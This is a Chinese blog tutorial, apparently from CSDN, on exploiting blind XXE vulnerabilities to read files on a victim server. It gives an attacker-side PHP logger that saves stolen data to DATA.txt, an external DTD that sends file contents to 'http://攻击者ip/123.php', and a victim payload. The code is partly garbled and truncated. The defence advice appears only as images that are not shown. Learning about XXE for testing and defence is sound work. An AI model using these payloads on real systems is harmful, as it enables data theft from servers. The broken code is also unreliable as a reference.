windows文件读取 xxe_XXE原来如此简单(无回显篇)

本文介绍了在已掌握回显XXE基础上如何利用无回显XXE漏洞,强调看不见不代表不存在。文章提出了三种突破无回显的方法:通过访问日志、公网服务器保存和DNS_LOG。并详细解释了第一种方法的操作过程,包括准备payload和分析过程,同时提醒读者学习防御和修复措施的重要性。
摘要由CSDN通过智能技术生成

ef0ac4c607830d40890452f632a65396.png

可能有人会好奇我为什么非要分成两篇来分享呢?

我的考虑是学习需要循序渐进

学习也不可能一蹴而就

短暂的爆发式学习状态会让一个人丧失后续的学习动力,当然不是所有人都这样。但是绝大多数是这样的。

相信你看到这篇文章的时候,你已经掌握了 回显XXE的发现和利用

重点:

那么在回显XXE的发现的基础上我们来分享一下无回显XXE怎么去利用呢?

既然是无回显,也就是说,我输入什么内容 ,查看什么内容,我们都将看不到,对吧!

那么既然如此该怎么办呢?

好了,不卖关子了,我直接给大家点破 这个玄机:

记住:看不见不代表不存在,看不见不代表不存在

我们确实是读取到了内容,但是,只是他没有给我显示出来而已

那么目前有三种方式可以突破这个难关

看不懂没关系,读完你就懂了

1、将读取的内容,当作一个网站的访问传参值,传入到自己的网站,我们去看网站的访问日志就可以看到

2、将读取的内容,保存在自己的公网服务器

3、DNS_LOG(这个算是神器,感兴趣的可以去了解)

1)第一种操作演示和讲解

先看看PYLOAD:

然后开始分析和讲解

(1)将以下123.php和234.xml保存到攻击者的WEB服务器下

1-123.php 不用改<?PHP file_put_contents("DATA.txt",$_GET(===============================================2-234.xml 设置下攻击者IP    "http://攻击者ip/123.php?id=%file;">">%all;

(2)直接发送payload给受害者

受害者POC: 设置下攻击者的IP 和 想要获取受害者数据的地址        <?xml version="1.0"?>%remote;%send;]就能读取任意文件并把数据保存到本地的data.txt文件里:

讲解:

先上帝视角略过一遍内容

37e0d032aa08a95b49437bc7191b9e99.png

我们先看受害者页面输入的内容部分:

7e37b096dea75fc6bd354c78fb170b43.png

好的接下来在看第二段

1afbc7e602e0bbd4ecffedc2cdb0a90f.png

91fada5065e1dc19d6e7a8c70efc8f89.png

704cee5a9075e42d097977d12de1fa44.png

e38a5852f29a539971d8f74c441fc5b2.png

95a69dc520af9e4eafb35cea44675042.png

4bfdae8ba8ca78d0a1a7c43c125ab21e.png

好的,123.xml也分析结束了,我们最后回到了开始部分,画黄线的就不用说了吧,他们也是代表着被调用的意思

e73f6c09096c5275232d2491b86af28a.png

既然,漏洞的发现和利用都会了,如果不会防御和修复的话,我怕你们给我寄刀片啊。

在这里呢,我就偷个懒吧,直接上图

0873e0f0b9e82c93d2046962ab5af0b3.png

6d4927ef2ab21efbb3660321db6c5195.png

604b428e36886b259d67abf102509f4f.png

c245ab46298f04b7e4495b6fa970f1b5.png

至此呢~XXE算是终结了

60b9ff42dcd603487be0df4c1a9b7460.png

  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值